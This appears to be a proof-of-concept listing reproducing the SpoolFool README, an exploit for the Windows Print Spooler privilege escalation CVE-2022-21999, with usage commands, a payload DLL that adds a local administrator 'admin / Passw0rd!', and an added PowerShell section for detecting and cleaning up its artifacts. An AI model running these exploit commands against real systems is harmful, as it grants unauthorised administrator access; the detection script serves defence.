
CVE-2022-21999 PoC — Microsoft Windows Print Spooler Components link following vulnerability

Associated Vulnerability
Title: Microsoft Windows Print Spooler Components link following vulnerability (CVE-2022-21999)
Description: Microsoft Windows Print Spooler Components is a print spooler component from Microsoft Corporation (USA). Microsoft Windows Print Spooler Components contains a link following vulnerability. The following products and versions are affected: Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation), Windows Server 2008 for x64-based Sy
Description
Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)
Readme
# SpoolFool

Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)

## Details

The provided exploit should work by default on all Windows desktop versions.

Please see the blog post for full technical details [here](https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81).

## Usage

```powershell
PS C:\SpoolFool> .\SpoolFool.exe

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
```

### PowerShell

```powershell
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
   -dll add_user.dll
   -dll add_user.dll -printer 'My Printer'
   -dll add_user.dll -dir 'SECRET'
   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
```

## Proof of Concept

The following PoC uses a DLL that creates a new local administrator `admin / Passw0rd!`. The DLL (`AddUser.dll`) and the source code can be found in this repository.

![](imgs/poc.png)

**Second run**

The following PoC demonstrates a second run of the provided exploit. Notice that on the second run the DLL is loaded without the vulnerability having to be exploited again.

![](imgs/second_run.png)

## Artifacts

After the exploit has been executed, the following artifacts will be left for later cleanup:
- The created printer driver directory is not removed
- The payload DLL is copied to the printer driver directory and it is not removed
- Any created printer is not removed
- The `SpoolDirectory` value of the targeted printer is not restored
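The artifacts listed above are also what a responder should look for on a host suspected of having run this exploit. The following PowerShell is an added example written for this page, not code from the SpoolFool repository or its author. It assumes the standard locations of the per-printer registry keys (`HKLM:\SYSTEM\CurrentControlSet\Control\Print\Printers\<name>`), the default spool directory and the x64 driver tree; the `-Days` window for recently written driver DLLs is an arbitrary triage choice.

```powershell
# Added example, not part of the SpoolFool repository: triage the four
# artifact classes listed in the README on a suspect host.
# Assumed locations (standard Windows paths, adjust if the host is non-standard):
$PrintersKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Printers'
$DefaultSpool = Join-Path $env:SystemRoot 'System32\spool\PRINTERS'
$DriverRoot   = Join-Path $env:SystemRoot 'System32\spool\drivers\x64'

function Get-SpoolDirectoryOverride {
    # Per-printer SpoolDirectory values that point somewhere other than the
    # default spool path. The exploit leaves the targeted printer's value
    # unrestored, so this is the most direct indicator.
    Get-ChildItem -Path $PrintersKey | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        $dir   = $props.SpoolDirectory
        if ($dir -and ($dir.TrimEnd('\') -ne $DefaultSpool)) {
            $isReparse = $false
            if (Test-Path -LiteralPath $dir) {
                # A junction/symlink here is the link-following primitive itself.
                $attrs     = (Get-Item -LiteralPath $dir -Force).Attributes
                $isReparse = [bool]($attrs -band [IO.FileAttributes]::ReparsePoint)
            }
            [PSCustomObject]@{
                Printer        = $_.PSChildName
                SpoolDirectory = $dir
                IsReparsePoint = $isReparse
            }
        }
    }
}

function Get-RecentDriverDll {
    param([int]$Days = 7)   # triage window, an arbitrary choice
    # The payload DLL is copied into the created driver directory and never
    # removed; list DLLs in the driver tree written inside the window.
    $since = (Get-Date).AddDays(-$Days)
    Get-ChildItem -Path $DriverRoot -Recurse -Filter '*.dll' -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -ge $since } |
        Select-Object FullName, LastWriteTime, Length
}

Get-SpoolDirectoryOverride | Format-Table -AutoSize
Get-RecentDriverDll        | Format-Table -AutoSize
# Any printer the exploit created is still present; review the list against
# what the host should have.
Get-Printer | Select-Object Name, DriverName, PortName | Format-Table -AutoSize
```

Once a targeted printer is identified, restoring it means clearing the override (`Set-ItemProperty -Path "$PrintersKey\<printer>" -Name SpoolDirectory -Value ''`, after which the spooler falls back to the default spool path), removing any printer the exploit added with `Remove-Printer -Name '<printer>'`, and deleting the dropped driver directory and DLL by hand. Restart the `Spooler` service after the registry change so the new value takes effect.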

## Authors
- Oliver Lyak [@ly4k_](https://twitter.com/ly4k_)

## References
- [SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)](https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81)
File Snapshot

```
[4.0K] /data/pocs/de8a55d16ba88ce9302ff1d6cf4c23ac11532da8
├── [4.0K] AddUser
│   ├── [1.4K] AddUser.sln
│   ├── [8.1K] AddUser.vcxproj
│   ├── [1.2K] AddUser.vcxproj.filters
│   ├── [ 165] AddUser.vcxproj.user
│   ├── [1.5K] dllmain.cpp
│   ├── [ 149] framework.h
│   ├── [ 186] pch.cpp
│   └── [ 563] pch.h
├── [ 10K] AddUser.dll
├── [4.0K] imgs
│   ├── [ 77K] poc.png
│   └── [ 30K] second_run.png
├── [1.0K] LICENSE
├── [2.0K] README.md
├── [4.0K] SpoolFool
│   ├── [ 184] App.config
│   ├── [ 16K] JunctionPoints.cs
│   ├── [4.2K] Printer.cs
│   ├── [8.2K] Program.cs
│   ├── [4.0K] Properties
│   │   └── [1.4K] AssemblyInfo.cs
│   ├── [2.3K] SpoolFool.csproj
│   └── [1.1K] SpoolFool.sln
├── [ 18K] SpoolFool.exe
└── [ 11K] SpoolFool.ps1

4 directories, 22 files
```